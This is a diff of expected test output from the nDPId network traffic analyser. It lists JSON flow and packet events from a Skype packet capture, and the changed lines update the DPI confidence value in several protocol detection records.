00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAABBTDEAAEAR4+jAqAEinTfrkDLdnGAALTL8e0kC17QicxuXB5auWkNIni8RcFzpWBK6wb+NIPIUjtvt0ICuYw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+n20AAEARW\/XAqAEib91NpTLdnEQAKqfKe0sCA3KviLJG1lAzDVoG9idWXcbF4pfswWYweShFk+5UVw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA71A4AAEARxQ\/AqAEinTeCkjLdnGEAJ5FDe00CRUi6WS8h8mPi8e9oMy1XIZqCitDbn3NkpyCi9w=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431970660037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660037,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0G21AAEAGBePAqAEiQAQXpsgznF2bjnkhscFgOoAQECxcjQAAAQEICj4x6XNMQvFq"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431970660159,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJkcJAADIG5BVsoKNswKgBIgG7yBaV3SxsiZUqrIAYACaXjgAAAQEICmGAz38+MVp4FwMBARB8Fy4qyreLjg5Q96tDDF\/tJNQpsIShBClYLxny\/F4IVS87inYaH8NMzidehO4QJLb0Gpm5qZy83nu17ekToUXtOsjvJgerL5AdcFL4wkOs5YWIZJQILj89EVd3kwm2gSreMO6fU0x3sDxMFrXZesIKTvERW3z9QiBmYf77CRAcaBKDIZ4h8M6jvsMWFjh8rbcU6C9Yz3364yiyHbQuoqtvQN4EQD7H\/ZMlnDFOtnG2H8aPUdqUMD5HAjMSCpEQqc4JKy0wVFFuLxpIEra0u2hVB7ftMdJLJ\/sq+RNwy1Sfuv0g7qCHweCB0CkHYTzB2\/cU6qQOlFTex1tRE+sh29iBulHeN2MmenT9xvrZggKZYQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1431970660159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660159,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/qVAAEAGakfAqAEibKCjbMgWAbuJlSqsld0tgYAQD\/f6XgAAAQEICj4x6exhgM9\/"} 01771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6TMEAAEARsjLAqAEib91KGDLdnGAAJk69e08C7Jn\/msaru979SjBYNnh0LMk7Ko\/+l6KrptIV"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4j48AAEARa97AqAEib91NoDLdnFAAJOlwe1ECSObCw6nUMfh7bnqIU3mueprtSIlR2AyZTQ=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgx0AAEARe8zAqAEib91KHDLdnFoALOnqe1MCA8GYjWWu9fDS5z8O1HnUzLtilbW9STWNzZ4dxAZIYogR"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3uKMAAEAR4H7AqAEinTeCkjLdgQkAI\/pPe1UCb1OUWk4YvTHMO4jKAgG4ML6WHkkTPHmm"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 